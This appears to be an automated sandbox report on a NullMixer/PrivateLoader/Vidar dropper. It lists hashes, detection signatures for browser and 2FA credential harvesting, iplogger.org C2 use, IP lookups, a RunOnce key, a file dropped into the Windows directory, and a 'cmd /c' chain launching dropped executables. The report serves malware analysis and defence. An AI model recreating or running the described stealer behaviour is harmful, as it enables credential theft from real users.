C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4f5b0f0ccef19f13cb7929ea17cd6584
SHA1 f25daf60e1499daa4cf95dc828f4d13b837e086e
SHA256 a7a655c20d88c724646f73313571c206466fa12b6c051244455276b4ce7b6843

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-07 09:15

Reported

2024-12-07 09:18

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

Vidar

stealer vidar

Vidar family

vidar

ASPack v2.12-2.42

aspackv2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\d5a6f77b01f6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\61d1121b032c3d74.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4048 wrote to memory of 344 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe
PID 4048 wrote to memory of 344 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe
PID 4048 wrote to memory of 344 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe
PID 344 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 344 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3572 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\61d1121b032c3d74.exe
PID 3572 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\61d1121b032c3d74.exe
PID 1940 wrote to memory of 1184 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\d5a6f77b01f6.exe
PID 1940 wrote to memory of 1184 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\d5a6f77b01f6.exe
PID 1008 wrote to memory of 2000 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe
PID 1008 wrote to memory of 2000 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe
PID 2868 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe
PID 2868 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe
PID 2868 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe
PID 1816 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe
PID 1816 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe
PID 1816 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe
PID 1512 wrote to memory of 1296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe
PID 1512 wrote to memory of 1296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe
PID 1512 wrote to memory of 1296 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe
PID 936 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\08280a9f8.exe
PID 936 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\08280a9f8.exe
PID 4656 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe
PID 4656 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe
PID 4656 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe
PID 1060 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e010.exe
PID 1060 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e010.exe
PID 1060 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e010.exe
PID 2000 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2000 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2000 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2772 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 2772 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 2020 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe
PID 2020 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe
PID 2020 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 17e6077dcf7a402.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 61d1121b032c3d74.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f08378aa2c3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c APPNAME55.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0637ac7677d0cf7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d5a6f77b01f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08280a9f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 97c06d9b6fa6f9.exe

C:\Windows\SysWOW64\cmd.exe

